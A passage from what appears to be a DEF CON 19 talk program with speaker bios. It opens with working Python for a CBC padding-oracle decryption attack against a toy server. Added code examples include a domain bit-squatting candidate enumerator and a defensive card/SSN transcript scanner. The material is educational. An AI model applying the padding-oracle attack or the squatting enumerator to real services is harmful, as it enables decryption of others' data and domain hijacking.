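    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D_k(target), recovered from the last byte backwards
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos
            forged = bytearray(BLOCK)  # replaces the real previous block
            for k in range(pos + 1, BLOCK):
                forged[k] = inter[k] ^ pad  # known tail bytes now decrypt to `pad`
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + target):
                    continue
                if pos == BLOCK - 1:
                    # "valid" may mean 0x01 or a longer run such as 0x02 0x02;
                    # disturbing the byte before it breaks only the longer run.
                    forged[pos - 1] ^= 0xFF
                    still_ok = oracle(bytes(forged) + target)
                    forged[pos - 1] ^= 0xFF
                    if not still_ok:
                        continue
                inter[pos] = guess ^ pad  # plaintext byte was `pad`, so D_k = guess ^ pad
                break
            else:
                raise RuntimeError("oracle accepted nothing; not a padding oracle")
        plain += _xor(bytes(inter), prev)  # real previous block gives real plaintext
    return pkcs7_unpad(plain)


def demo():
    """Encrypt SECRET under a random key, then recover it through the oracle alone."""
    server = LeakyServer(os.urandom(16))
    token = cbc_encrypt(server.key, os.urandom(16), SECRET)
    return recover_plaintext(server.padding_ok, token), server.queries
```

The fix is not a better cipher: it is denying the oracle, either by authenticating the ciphertext (an HMAC checked before decryption, or an AEAD mode) so a tampered token is rejected before padding is ever inspected, and by making the remaining failure path indistinguishable in message and timing.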



Daniel Crowley is an Application Security Consultant for Trustwave's SpiderLabs team. He has been working in the information security industry for over 6 years and has been focused on penetration testing, specifically on Web applications. Daniel is particularly interested in vulnerabilities caused by a failure to account for little known or even undocumented properties of the platforms on which applications run. He especially enjoys playing around with Web based technologies and physical security technologies and techniques. Dan also rock climbs and makes a mean chili.

Twitter: @dan_crowley

return to top

Taking Your Ball And Going Home; Building Your Own Secure Storage Space That Mirrors Dropbox's Functionality

When for-profit companies offer a free app, there are always going to be strings attached. As we have increasingly seen, these strings are often tied to your privacy to enable said third party company to monetize you in some way, but in worse cases your security can be compromised, leaving you open to identity theft at best or legal repercussions at worst. One of today's most ubiquitous apps is Dropbox, which operates as a file hosting service that uses "cloud computing" (aka the internet) to enable users to store and share files and folders with others using file synchronization. Sounds harmless enough until you start thinking about how they can do so much for free. Learn about the flaws discovered by security researchers that have caused Dropbox to significantly change their terms of service, and about a group building a free, open-source option for anyone to use to share and protect their data. Learn, get involved, help and CYA, because for-profit third party companies are not going to do it for you.



Phil Cryer (fak3r) is a systems engineer and privacy advocate who has worked on Linux and open source solutions for over 10 years. While balancing security with openness he has lectured globally on ways to open data silos to facilitate scientific discovery, but is equally comfortable talking about sharing any kind of data. His favorite memory from previous DEFCONs was yelling at the screen during a late night screening of Wargames, but locking himself out of his own room at last year's con is a close second. He learns by doing, believes that imagination is more important than knowledge, and like all good IT professionals, has a bachelor degree in fine arts.

Twitter: @fak3r

return to top

PCI 2.0: Still Compromising Controls and Compromising Security

Building on last year's panel discussion of PCI and its impact on the world of infosec, we are back for more, including "actionable" information. Having framed the debates in the initial panel, this year we will focus on what works, what doesn't, and what we can do about it.



Compliance issues in general, and PCI-DSS in particular, are driving security in many organizations. In tight financial times, limited security resources are often exhausted on the "mandatory" (compliance) at the expense of the "optional" (actual security). We will focus on the information needed to reconcile these issues, and encourage the audience to continue the discussion with us.



Jack Daniel is old, and has a Unix Beard, so people mistakenly assume he knows stuff. He still makes no attempt to correct this gross misunderstanding. Jack has proven himself to be an inciteful moderator on compliance topics. He has many years of network and systems administration experience, and a bunch of letters after his name. Jack lives and breathes network security as Product Manager for Tenable.



James Arlen , CISA, sometimes known as Myrcurial is a cyber-security cyber-consultant usually found in tall buildings wearing a cyber-suit, founder of the Think|Haus hackerspace, columnist at Liquidmatrix Security Digest, Infosec Geek, Hacker, Social Activist, Author, Speaker and Parent. He's been at this security game for more than 15 years and loves blinky lights and shiny things. Cyber.



Joshua Corman is the Research Director for Enterprise Security at The 451 Group and founder of RuggedSoftware.org. A passionate advocate for the security practitioner, he is known for his candor, intellectual honesty, and willingness to challenge the status quo - tackling topics like his 7 Dirty Secrets of the Security Industry and Is PCI the No Child Left Behind Act for Security?



Alex Hutton likes risk, critical thinking, and data. He writes for newschoolsecurity.com dub cloud.com, and Verizon's security blog.



Martin McKeay is the host and author of the Network Security Blog and Podcast. He is a well known expert in the field of PCI and has worked as a QSA for over four years; he's seen the security compliance can encourage, as well as the lengths people will go to in order to avoid implementing real security. He is an advocate for PCI and compliance while recognizing its limitations, a dichotomy that sometimes threatens his sanity.



Dave Shackleford is a SANS Analyst, instructor and GIAC technical director. He has consulted with hundreds of organizations in the areas of regulatory compliance, security, and network architecture and engineering. He's worked as CSO for Configuresoft, CTO for the Center for Internet Security, and has also worked as a security architect, analyst, and manager for several Fortune 500 companies.

return to top

Former Keynotes - The Future

Former keynotes keep coming back to DEFCON. Join The Dark Tangent, Rod Beckstrom, Jerry Dixon, Tony Sager, and Linton Wells to discuss the future of cyber security.



Dark Tangent Bio to Come



Rod Beckstrom is a highly successful entrepreneur, founder and CEO of a publicly-traded company, a best-selling author, avowed environmentalist, public diplomacy leader and, most recently, the head of a top-level federal government agency entrusted with protecting the nation's communication networks against cyber attack. Throughout 2008, Rod served as the Director of the National Cybersecurity Center (NCSC) at the U.S. Department of Homeland Security, where he reported to the Secretary of DHS, and was charged with cooperating directly with the Attorney General, National Security Council, Secretary of Defense, and the Director of National Intelligence (DNI). Prior to joining DHS, he served on the DNI's Senior Advisory Group. Rod is unique in having experienced the inner workings of two, highly-charged, often competing, federal security agencies created in the wake of the September 11th attacks, an event that he says, "changed my life."



Rod is widely regarded as a pre-eminent thinker and speaker on issues of cybersecurity and related global issues, as well as on organizational strategy and leadership. He is also an expert on how carbon markets and "green" issues affect business. While Director of the NCSC, Rod developed an effective working group of leaders from the nation's top six cybersecurity centers across the civilian, military and intelligence communities. His work led to his development of a new economic theory that provides an explicit model for valuing any network, answering a decades-old problem in economics. Rod co-authored four books including The Starfish and the Spider: The Unstoppable Power of Leaderless Organizations, a best-selling model for analyzing organizations, leadership styles, and competitive strategy. The Starfish and the Spider has been translated into 16 foreign editions and is broadly quoted.



At age 24, Rod started his first company in a garage apartment and, subsequently, grew it into a global enterprise with offices in New York, London, Tokyo, Geneva, Sydney, Palo Alto, Los Angeles, and Hong Kong. CATS Software Inc., went public and later sold. Nobel Laureates Myron Scholes and William F. Sharpe served on the company's boards of directors and advisors. While at CATS Rod helped advance the financial theory of "value at risk," now used globally for all key banking risk management. Rod co-edited the first book to introduce "value at risk." Rod also co-founded Mergent Systems, a pioneer in inferential database engines, which Commerce One later acquired for $200 million. He has co-launched other collaborations, software, and internet service businesses, as well. From 1999 to 2001, he served as Chairman of Privada, Inc, a leader in technology enabling private, anonymous, and secure credit card transactions over the internet.



In 2003, Rod co-founded a global peace network of CEOs which initiated Track II diplomatic efforts between India and Pakistan. The group's symbolic actions opened the borders to people and trade, and contributed to ending the most recent Indo-Pak conflict. It is one of several non-profit groups and initiatives Rod has started. He now serves on the boards of the Environmental Defense Fund, which Fortune Magazine ranked as one of the seven most powerful boards in the world, and Jamii Bora Trust, an innovative micro-lending group in Africa with more than 200,000 members. He is a graduate of Stanford University with an MBA and a BA with Honors and Distinction. He served as Chairman of the Council of Presidents of the combined Stanford student body (ASSU) and was a Fulbright Scholar at the University of St. Gallen in Switzerland. Rod commenced as President and CEO of ICANN on 1 July 2009.



Jerry Dixon currently serves as Director of Analysis for Team Cymru and is the former Director of the National Cyber Security Division (NCSD) & US-CERT of the Department of Homeland Security. He continues to advise partners on national cyber-security threats, aids organizations in preparing for cyber-attacks, and assists with the development of cyber-security policies for organizations.



Tony Sager is the Chief of the Vulnerability Analysis and Operations (VAO) Group within the Information Assurance Directorate at the National Security Agency. VAO's mission is to identify and analyze the vulnerability of information, technology, and operations for NSA customers, primarily within the Defense Department and the Intelligence Community. VAO is also very active in helping the broader national security community deal with these same problems through guidance and standards. VAO has received recognition from several private sector sources (including SC Magazine Editor's Choice for 2007; and The National Information Security Leadership Award from Government Executive Magazine and the SANS Institute).



During his 30 year career at the NSA, Tony has held a number of technical and managerial positions in Computer/Network Security and software analysis. He holds a BA in Mathematics from Western Maryland College and an MS in Computer Science from the Johns Hopkins University. Tony is also a graduate of the US Army Signal Officer Basic Course (as a civilian), and the National Security Leadership Course. He is a frequent keynote speaker and panelist at national and international security events.



Linton Wells II is the Director of the Center for Technology and National Security Policy (CTNSP) at National Defense University (NDU). He also is a Distinguished Research Professor and serves as the University's Transformation Chair. Prior to coming to NDU he served in the Office of the Secretary of Defense (OSD) from 1991 to 2007, serving last as the Principal Deputy Assistant Secretary of Defense (Networks and Information Integration). In addition, he served as the Acting Assistant Secretary and DoD Chief Information Officer for nearly two years. His other OSD positions included Principal Deputy Assistant Secretary of Defense (Command, Control, Communications and Intelligence-C3I) and Deputy Under Secretary of Defense (Policy Support) in the Office of the Under Secretary of Defense (Policy).



In twenty-six years of naval service, Dr. Wells served in a variety of surface ships, including command of a destroyer squadron and guided missile destroyer. In addition, he acquired a wide range of experience in operations analysis; Pacific, Indian Ocean and Middle East affairs; and C3I. Recently he has been focusing on STAR-TIDES, a research project focusing on sustainable support to populations under stress and public-private interoperability (www.star-tides.net).



Dr. Wells was born in Luanda, Angola, in 1946. He graduated from the United States Naval Academy in 1967 and holds a Bachelor of Science degree in physics and oceanography. He attended graduate school at The Johns Hopkins University, receiving a Master of Science in Engineering degree in mathematical sciences and a PhD in international relations. He is also a 1983 graduate of the Japanese National Institute for Defense Studies in Tokyo, the first U.S. naval officer to attend there.



Dr. Wells has written widely on security studies in English and Japanese journals. He co-authored Japanese Cruisers of the Pacific War, which was published in 1997. His hobbies include history, the relationship between policy and technology, and scuba diving. He has thrice been awarded the Department of Defense Medal for Distinguished Public Service.

return to top

Introduction to Tamper Evident Devices

Tamper evident technologies are quickly becoming an interesting topic for hackers around the world. DEF CON 18 (2010) held the first ever "Tamper Evident" contest, where contestants were given a box sealed with a variety of tamper evident devices, many of which purport to be "tamper proof." All of these devices were defeated, even by those with little experience and a limited toolkit. Like the computer world, many of these devices are overmarketed and it is difficult for the average person to compare different tamper evident technologies.



This talk covers the design and uses of tamper evident devices used in the commercial and government sectors. We'll dig into the nitty gritty of how many of these devices work, the methods by which they can be defeated, and live demonstrations of defeats against common tamper evident devices. Be advised: this talk is for only the stealthiest of ninjas; pirates need not apply.



datagram has taught about locks, safes, and methods to compromise them for many years, including training to private companies and government agencies. He has spoken many times on physical and digital security at various conferences and is a part-time forensic locksmith. datagram runs the popular lock and security websites lockwiki.com and lockpickingforensics.com. datagram is the leader of "The Motherfucking Professionals," the team that won the first Tamper Evident contest at DEF CON 18.

return to top

VDLDS — All Your Voice Are Belong To Us

Anytime you want to bypass the system, you tend to have a telephone conversation instead of leaving a paper trail. Data Leakage Prevention (DLP) is at the top of the list for most organizations, be it the financial or medical industry. In order to overcome this issue we need to devise a new system that can monitor phone conversations. A Voice Data Leakage Detection System can be used for tracking credit card numbers, social security numbers, and other PII data. An extension of this can be used for tracking accounting and financial information that leaves the organization before the information is actually public. This will help spot the people leaking insider information to traders, competitors and other news sources. By utilizing a signature system, each environment can quickly capture sensitive information like the acquisition or sale of the organization, or honeypot data to find the insider leaks.
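The "signature system" side of such a detector, as an added example that is not the speakers' code and assumes nothing about their implementation: once speech-to-text has produced transcript lines, the detector has to cope with numbers read aloud ("four one one one") and with digit groups split by pauses, then separate real card numbers from look-alike digit runs. The Luhn check does most of that filtering for cards; for SSNs the SSA's never-issued ranges are the only structural check available, so the false-positive rate there is higher. The transcript lines below are constructed, and the detector stores only masked values so that it does not itself become a second copy of the data it is hunting.

```python
import re

_WORDS = {"zero": "0", "one": "1", "two": "2", "three": "3", "four": "4",
          "five": "5", "six": "6", "seven": "7", "eight": "8", "nine": "9"}
_WORD_RE = re.compile(r"\b(" + "|".join(_WORDS) + r")\b")
_JOIN_RE = re.compile(r"(?<=\d)[\s,.\-]+(?=\d)")  # separators between digit groups
_CARD_RE = re.compile(r"\b\d{13,19}\b")
_SSN_RE = re.compile(r"\b\d{9}\b")

# Constructed sample transcript, roughly as a speech-to-text engine might emit it.
TRANSCRIPT = [
    "agent: thanks for calling, can I get the card number",
    "caller: sure it's four one one one, one one one one, one one one one, one one one one",
    "agent: and your social, the whole thing is fine",
    "caller: 123-45-6789",
    "caller: my order number is 5555 4444 3333 2222 if that helps",
    "agent: the invoice total came to 94103 dollars, is that right",
]


def normalize(text):
    """Spoken digits to numerals, then fuse digit groups: 'four one one one,
    one one one one' and '4111 1111' both become one contiguous digit run."""
    digits = _WORD_RE.sub(lambda m: _WORDS[m.group(1)], text.lower())
    return _JOIN_RE.sub("", digits)


def luhn_ok(number):
    """Luhn check digit: rejects most card-length runs that are not cards."""
    total, double = 0, False
    for ch in reversed(number):
        d = int(ch) * 2 if double else int(ch)
        total += d - 9 if d > 9 else d
        double = not double
    return total % 10 == 0


def ssn_plausible(nine):
    """SSA rules: area 000, 666 or 9xx, group 00 and serial 0000 are never issued."""
    area, group, serial = nine[:3], nine[3:5], nine[5:]
    return area not in ("000", "666") and area[0] != "9" and group != "00" and serial != "0000"


def scan_line(text):
    """(type, masked) findings for one transcript line; raw digits are not kept."""
    found, norm = [], normalize(text)
    for m in _CARD_RE.finditer(norm):
        if luhn_ok(m.group()):
            found.append(("credit_card", "*" * (len(m.group()) - 4) + m.group()[-4:]))
    for m in _SSN_RE.finditer(norm):
        if ssn_plausible(m.group()):
            found.append(("ssn", "***-**-" + m.group()[-4:]))
    return found


def scan_transcript(lines):
    """Findings across a whole call as (line index, type, masked value)."""
    return [(i, kind, masked)
            for i, line in enumerate(lines)
            for kind, masked in scan_line(line)]
```

Run against `TRANSCRIPT`, the scanner flags the spoken card number on line 1 and the SSN on line 3, and passes over the "order number" on line 4 because it fails the Luhn check even though it has card length. The same hooks (a normalizer plus a list of compiled signatures) are where an environment-specific signature, such as a code name for a pending acquisition or a planted honeypot string, would be added.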



Ganesh Devarajan is the Sr. Security Architect within Go Daddy's Security Research Team. His focuses are Web Applications security, Malware Analysis, Reputation Service and Cloud security.



Ganesh has a wide variety of experience in his field. Prior to joining Go Daddy in 2010, he worked as a security researcher for TippingPoint DVLabs and the THECASE Research Center in Syracuse, NY. He has publications in a variety of fields, ranging from Supervisory Control and Data Acquisition (SCADA) security, Role Based Access Control (RBAC) and wireless security to runtime software application patches. His talks have been presented at various venues, including RSA, the Department of Defense (DoD) Cybercrime conference, DEFCON, LayerOne, Reboot, the National Petrochemicals & Refiners Association (NPRA), SMi, the Hawaii International Conference on Social Sciences (HICSS), the International Information Security Conference (IFIP/SEC) and Hacker Halted.



Don LeBert currently works as a Security Engineer for GoDaddy.com Inc. He has been working with hosting providers for the past 5 years, filling the roles of Network Administrator, Server Administrator and Server Manager. Don holds a Bachelor's degree in Information Systems and a Master's degree in Information Security.

return to top

Safe to Armed in Seconds: A Study of Epic Fails of Popular Gun Safes

Hackers like guns. Hackers like locks. Hackers like to tinker with guns and locks. And, most of the time, hackers protect their guns with high-quality locks. However, while it's one thing to own a nice gun safe protected by a high security dial, that sort of solution tends to be best for the firearms that one doesn't have in daily use. Many of us who wear a firearm as part of our daily routine opt to store and secure our carry piece in a separate, more easily-accessible way at the end of the day. This talk is an in-depth evaluation of some of the most popular small firearm lockboxes in-use today. Some rely on mechanical locks, others on biometric locks, and some offer a combination of both. But overall, they tend to fail miserably in the face of any dedicated attacker. Come and learn how your favorite gun lockbox might be preventing your toddler from having an accidental discharge, but why it's not at all likely to repel a criminal or even perhaps a curious teenager. Means of both attacking as well as improving upon the lockboxes you already may own will be demonstrated, and audience members will be invited to participate in all sorts of attacks... live and on stage!



Deviant Ollam's first and strongest love has always been teaching. A graduate of the New Jersey Institute of Technology's Science, Technology, & Society program, he is always fascinated by the interplay that connects human values and social trends to developments in the technical world. While earning his BS degree at NJIT, Deviant also completed the History degree program at Rutgers University.



While paying the bills as a security auditor and penetration testing consultant with The CORE Group, Deviant is also a member of the Board of Directors of the US division of TOOOL, The Open Organisation Of Lockpickers. Every year at DEFCON and ShmooCon Deviant runs the Lockpicking Village, and he has conducted physical security training sessions at Black Hat, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, CanSecWest, ekoparty, and the United States Military Academy at West Point. His favorite Amendments to the US Constitution are, in no particular order, the 1st, 2nd, 9th, & 10th.

Twitter: @DeviantOllam

return to top

Whitfield Diffie and Moxie Marlinspike

Come watch Whitfield Diffie and Moxie Marlinspike talk about certificate authorities, DNSSEC, SSL, DANE, trust agility and whatever else they want to. Moderated by the Dark Tangent and with Q&A from the audience.





return to top

Bit-squatting: DNS Hijacking Without Exploitation

We are generally accustomed to assuming that computer hardware will work as described, barring deliberate sabotage. This assumption is mistaken. Poor manufacturing, errant radiation, and heat can cause malfunction. Commonly, such malfunctions in DRAM chips manifest as flipped bits. Security researchers have known about the danger of such bit flips, but these attacks have not been very practical. Thanks to ever-higher DRAM densities and the use of computing devices outdoors and in high-heat environments, that has changed. This presentation will show that far from being a theoretical nuisance, bit flips pose a real attack vector. First the presentation will describe bit-squatting, an attack akin to typo-squatting, where an attacker controls domains one bit away from a commonly queried domain (e.g. mic2osoft.com vs. microsoft.com). To verify the seriousness of the issue, I bit-squatted several popular domains, and logged all HTTP and DNS traffic. The results were shocking and surprising, ranging from misdirected DNS queries to requests for Windows updates. The presentation will show an analysis of 6 months of real DNS and HTTP traffic to bit-squatted domains. The traffic will be shown in terms of affected platform, domain queried, and HTTP resources requested. Using this data the presentation will also attempt to ascertain the cause of the bit-flip, such as corruption on the wire, in requestor RAM, or in the RAM of a third party. The presentation will conclude with potential mitigations of bit-squatting and other bit-flip attacks, including both hardware and software solutions. By the end I hope to convince the audience that bit-squatting, and other attacks enabled by bit-flip errors, are practical and serious, and should be addressed by software and hardware vendors.
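The enumeration step behind the attack, as an added example that is not the speaker's code or data: given a target name, list every domain one bit away from its second-level label and keep only those a squatter could actually register. Most of the 8 flips per byte are useless to an attacker and are discarded here: clearing bit 5 of a lowercase letter yields its uppercase form, which DNS treats as the same name; other flips land on a dot, an underscore or a control byte that never survives as a distinct label. The example goes slightly beyond the abstract's single mic2osoft.com illustration in that it also reports which byte and bit produced each candidate, which is what you would later correlate against logged traffic. Restricting the mutation to the second-level label is an assumption of this example (a flipped TLD is not something a squatter can register).

```python
import string

# Letters, digits and hyphen: the only characters a registrable hostname label may hold.
_LDH = set(string.ascii_lowercase + string.digits + "-")


def single_bit_flips(byte):
    """Yield (value, bit) for the 8 values differing from `byte` in exactly one bit."""
    for bit in range(8):
        yield byte ^ (1 << bit), bit


def bitsquat_candidates(domain):
    """Map each registrable one-bit variant of `domain`'s second-level label to the
    (byte position, bit index) that produces it.

    Uppercase results are dropped because DNS is case-insensitive, so MICROSOFT.com
    still resolves to the legitimate owner; '.', '_' and control bytes are dropped
    because no registry will take them and no resolver emits them as a label.
    """
    domain = domain.lower().rstrip(".")
    labels = domain.split(".")
    if len(labels) < 2:
        raise ValueError("need at least a second-level label and a TLD")
    sld = labels[-2]
    out = {}
    for pos, ch in enumerate(sld):
        for flipped, bit in single_bit_flips(ord(ch)):
            c = chr(flipped)
            if c not in _LDH:
                continue
            new_label = sld[:pos] + c + sld[pos + 1:]
            if new_label.startswith("-") or new_label.endswith("-"):
                continue  # hyphen may not lead or trail a label
            out[".".join(labels[:-2] + [new_label, labels[-1]])] = (pos, bit)
    return out


def bit_distance(a, b):
    """Hamming distance in bits between two equal-length ASCII strings."""
    if len(a) != len(b):
        raise ValueError("strings must be the same length")
    return sum(bin(ord(x) ^ ord(y)).count("1") for x, y in zip(a, b))


if __name__ == "__main__":
    for name, (pos, bit) in sorted(bitsquat_candidates("microsoft.com").items()):
        print(f"{name:20s}  byte {pos:2d}  bit {bit}")
```

The defender's use of the same list is to register the candidates first, or at least to resolve them periodically and watch for ones that suddenly acquire A records. It also shows why case matters to the measurement: a flip that uppercases a letter is real memory corruption, but it is invisible in DNS logs because the query still reaches the legitimate server.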



Artem Dinaburg currently works as a security researcher at Raytheon, investigating a broad range of security related topics. Prior to joining Raytheon, Artem worked as a security researcher building automated malware analysis systems, investigating web-based exploit kits, and identifying botnet command-and-control domains. While a graduate student at Georgia Tech he created hypervisor-based dynamic malware analysis platforms under Dr. Wenke Lee.


A Bridge Too Far: Defeating Wired 802.1x with a Transparent Bridge Using Linux

Using Linux and a device with 2 network cards, I will demonstrate how to configure an undetectable transparent bridge to inject a rogue device onto a wired network that is secured via 802.1x using an existing authorized connection. I will then demonstrate how to set up the bridge to allow remote interaction and how the entire process can be automated, creating the ultimate drop and walk away device for physical penetration testers and remote testers alike.



Alva 'Skip' Duckwall has been using Linux back before there was a 1.0 kernel and has since moved into the information security arena doing anything from computer/network auditing, to vulnerability assessments and penetration testing. Skip currently holds the following certs: CISSP, CISA, GCIH, GCIA, GCFW, GPEN, GWPT, GCFA, GSEC, RHCE, and SCSA and is working on getting his GSE. Skip currently works for Northrop Grumman as a Sr. Cyber Something or other.


Virtualization under attack: Breaking out of KVM

KVM, the Linux Kernel Virtual Machine, seems destined to become the dominant open-source virtualization solution on Linux. Virtually every major Linux distribution has adopted it as their standard virtualization technology for the future. And yet, to date, remarkably little work has been done on exploiting vulnerabilities to break out of KVM.



We're here to fix that. We'll take a high-level look at KVM's architecture, comparing and contrasting with other virtualization systems and describing attack surfaces and possible weaknesses. Using the development of a fully-functioning exploit for a recent KVM vulnerability, we'll describe some of the difficulties involved with breaking out of a VM, as well as some features of KVM that are helpful to an exploit author.



Once we've explored the exploit in detail, we'll finish off with a demonstration against a live KVM instance.



Nelson Elhage is a kernel hacker for Ksplice, Inc., where he works on providing rebootless security updates for the Linux kernel. In his spare time, he mines for bugs in the Linux kernel and other pieces of open-source systems software.



@nelhage


I Am Not a Doctor but I Play One on Your Network

How secure is your Protected Health Information? This talk will expose the world of Health Information Systems with an in-depth technical review of their common protocols and technologies. Many of these life-critical systems had once relied on the security provided by air-gapped medical networks. Recently, in an effort to realize savings and further share health information, medical systems have moved onto interconnected networks, opening them up to a plethora of attacks. We believe these systems have not had adequate research performed against them due to high cost and relatively low availability. Our talk will not only reveal weaknesses we have discovered in medical protocols but will create a foundation of knowledge for researchers who want to continue investigation of these systems. We will release findings and vulnerabilities that were discovered during the course of this research as well as fuzzers designed to allow penetration testers and researchers to further assess healthcare-specific protocols for security vulnerabilities. We will take a look at healthcare-specific hardware and discuss vulnerabilities related to these devices, including prescription-dispensing drug cabinets and the ability to dispense scheduled substances without authentication, authorization, or accounting. Finally, we will discuss how the impact of vulnerabilities on healthcare systems has changed with the introduction of large health information repositories such as Google Health and Microsoft HealthVault as well as with countless regional and national Health Information Exchanges.



Tim Elrod and Stefan Morris have a combined experience of over 10 years working specifically in the healthcare industry, assessing health information systems for security vulnerabilities. Together they have audited and discovered vulnerabilities in most major healthcare-specific protocols in use by health care providers today.


Mamma Don't Let Your Babies Grow Up to be Pen Testers - (a.k.a. Everything Your Guidance Counselor Forgot to Tell You About Pen Testing)

Always wanted to be a 1337 penetration tester capable of deciphering Kryptos while simultaneously developing your own custom 0-days? Then this is NOT the talk for you. We will however make you laugh by presenting an honest look at the life and times of a penetration tester today. We promise to open your eyes to aspects of the job you may not have considered before (at least we hadn't considered them before we started). Drawn from personal experience, this talk will focus on the myths and realities of penetration testing as a "for-sale" service. We love being penetration testers but we're pretty sure the guidance counselor forgot to mention there was a dark side to all the fun. We got the job with a little knowledge, a couple of lamer exploits, and high expectations. We expected firewalls and IDS to be the only thing standing between us and our beloved shells, but it turns out something far more sinister waited for us. Deadlines, timelines, reporting, scope, budgets, and chubby fingers quickly reared their ugly heads and threatened to smash our dreams. Like all PT'ers before us, we soon found out how important each of these topics is and what a critical role they play in our day-to-day activities. Join us for a unique and humorous 20-minute presentation as we air the dirty laundry about the mechanics of penetration testing and open your eyes to the untold aspects of the best job on earth.



Dr. Pat Engebretson is an Assistant Professor of Information Assurance at Dakota State University in Madison, SD. He teaches graduate and undergraduate classes in penetration testing, operating system security, and programming. Dr. Engebretson also serves as a Senior Penetration Tester for a security consulting company in the Midwest. Before returning to academia, Dr. Engebretson spent 5 years as a Network Security Officer for a financial institution. He recently published a book on the basics of hacking and penetration testing for Syngress and he works non-stop to weave past experiences into the classroom, integrate hands-on material, and open his students' eyes to the wonders of DEF CON.

Twitter: pengebretson



Dr. Josh Pauli is an Associate Professor of Information Assurance at Dakota State University in Madison, SD where he teaches graduate and undergraduate courses in web and software security. His background is in software engineering and information systems. Dr. Pauli first attended DEF CON 16 (friggin' n00b) and was hooked immediately - he has spent every waking moment since then trying to figure out how to inject DEF CON into DSU's security program and bring his students to DEF CON 19 and beyond!

Twitter: CornDogGuy


Steganography and Cryptography 101

There are a lot of great ways to hide your data from prying eyes. This talk will give a crash course in the technology and some tools that can be used to secure your data. It will also discuss hiding your files in plain sight so an intruder will have no idea that hidden files even exist. These same techniques can also be employed by somebody wishing to transmit messages.



Eskimo (Neil Weitzel) is a Technology Analyst for Indiana University. At IU he works for Research Systems and Decision Support, where he performs various tasks to provide a solid infrastructure and secure environment for researchers. Outside of employment Eskimo also does freelance work. He is an avid scripter and automationist.

@neiltxc

AIM: NeilTXC

facebook.com/neiltxc


Don't Drop the SOAP: Real World Web Service Testing for Web Hackers

Over the years web services have become an integral part of web and mobile applications. From critical business applications like SAP to mobile applications used by millions, web services are becoming more of an attack vector than ever before. Unfortunately, penetration testers haven't kept up with the popularity of web services, recent advancements in web service technology, testing methodologies and tools. In fact, most of the methodologies and tools currently available either don't work properly, are poorly designed or don't fully test for real world web service vulnerabilities. In addition, environments for testing web service tools and attack techniques have been limited to home grown solutions or worse yet, production environments.



In this presentation Tom, Josh and Kevin will discuss the new security issues with web services and release an updated web service testing methodology that will be integrated into the OWASP testing guide, new Metasploit modules and exploits for attacking web services, and an open source vulnerable web service for the Samurai-WTF (Web Testing Framework) that can be used by penetration testers to test web service attack tools and techniques.



Tom Eston is a Senior Security Consultant for SecureState. Tom is a senior member of SecureState's Profiling team, which provides attack and penetration testing services for SecureState's clients. Tom focuses much of his research on new technologies such as social media and mobile devices. He is the founder of SocialMediaSecurity.com which is an open source community dedicated to exposing the insecurities of social media. Tom is also a security blogger, co-host of the Security Justice and Social Media Security podcasts and is a frequent speaker at security user groups and national conferences including Notacon, OWASP AppSec, DEFCON and ShmooCon.



Twitter: @agent0x0



Joshua "Jabra" Abraham joined Rapid7 in 2006 as a Security Consultant. Josh has extensive IT Security and Auditing experience and worked as an enterprise risk assessment analyst for Hasbro Corporation. Josh specializes in penetration testing, web application security assessments, wireless security assessments, and custom code development. He has spoken at BlackHat, DEFCON, ShmooCon, The SANS Pentest Summit, Infosec World, CSI, OWASP Conferences, LinuxWorld, Comdex and BLUG. In his spare time, he contributes code to open source security projects such as the BackTrack LiveCD, BeEF, Nikto, Fierce, and PBNJ. He is frequently quoted in the media regarding Microsoft Patch Tuesday and web application security by ComputerWorld, DarkReading and SC Magazine.



Twitter: @jabra



Kevin Johnson is a security consultant and founder of Secure Ideas. Kevin came to security from a development and system administration background. He has many years of experience performing security services for fortune 100 companies, and in his spare time he contributes to a large number of open source security projects. Kevin's involvement in open-source projects is spread across a number of projects and efforts. He is the founder of many different projects and has worked on others. He founded BASE, which is a Web front-end for Snort analysis. He also founded and continues to lead the SamuraiWTF live DVD. This is a live environment focused on Web penetration testing. He also founded Yokoso and Laudanum, which are focused on exploit delivery. Kevin is a certified instructor for SANS and the author of Security 542: Web Application Penetration Testing and Ethical Hacking. He also presents at industry events, including DEFCON and ShmooCon, and for various organizations, like Infragard, ISACA, ISSA, and the University of Florida.



Twitter: @secureideas


"Get Off of My Cloud": Cloud Credential Compromise and Exposure

An Amazon Machine Image (AMI) is a virtual appliance container used to create virtual machines (VMs) within the Amazon Elastic Compute Cloud (EC2). EC2 instances typically interact with a variety of Amazon Web Services (AWS), and as such require access to AWS credentials and private key materials. In this presentation we will explore how AWS credentials and keys may end up being persisted within an AMI. If persisted within a public or shared AMI, these credentials and key materials may be unintentionally shared with 3rd parties. We will discuss the different types of AWS credentials and key materials, how they are used to access different Cloud services, and the risks and potential impacts of compromise of this sensitive information. A new tool, "AMIexposed", will be released that can check an AMI for the most common ways AWS credentials and keys are persisted within an AMI. The results of research using AMIexposed against public AMIs will be presented, helping to quantify the scope and prevalence of AWS credentials and keys exposed within public AMIs. We'll also discuss the risks inherent in trusting public AMIs to be free of backdoors, trojans, and other malicious hitchhikers. Results of an experiment demonstrating these risks will be presented. Finally, the talk will propose best practices for utilizing AMIs. These will include specific steps for ensuring your organization's AWS credentials and key materials are not unintentionally persisted within public or shared AMIs, and recommendations regarding usage of 3rd party public AMIs.



Ben Feinstein is Director of CTU Operations & Analysis with the Dell SecureWorks Counter Threat Unit (CTU). Ben is an author of RFC 4765 and RFC 4767, and has over a decade of experience designing, implementing and operationalizing security-related information systems. His major areas of expertise include network IDS/IPS, digital forensics and incident response, and security operations. Ben has previously presented at Black Hat USA, DEF CON, ToorCon, DeepSec, the U.S. Department of Defense Cyber Crime Conference, and many other events. He is active in his local DEF CON group, DC404.



Jeff Jarmoc: A first time DEF CON presenter, Jeff has been hacking most of his life. He got his start in the early days of the 312 BBS scene, moved on to IRC and USENET, and eventually pursued a career in enterprise infrastructure and security. His latest passion is abusing ubiquitous infrastructure devices and systems in an attempt to bring renewed focus on the security of these systems everyone has come to rely on. Jeff has previously spoken at Black Hat USA. When not abusing software and hardware he enjoys spending time with his wife and daughter.

Twitter: @jjarmoc


Handicapping the US Supreme Court: Can We Get Rich by Forceful Browsing?

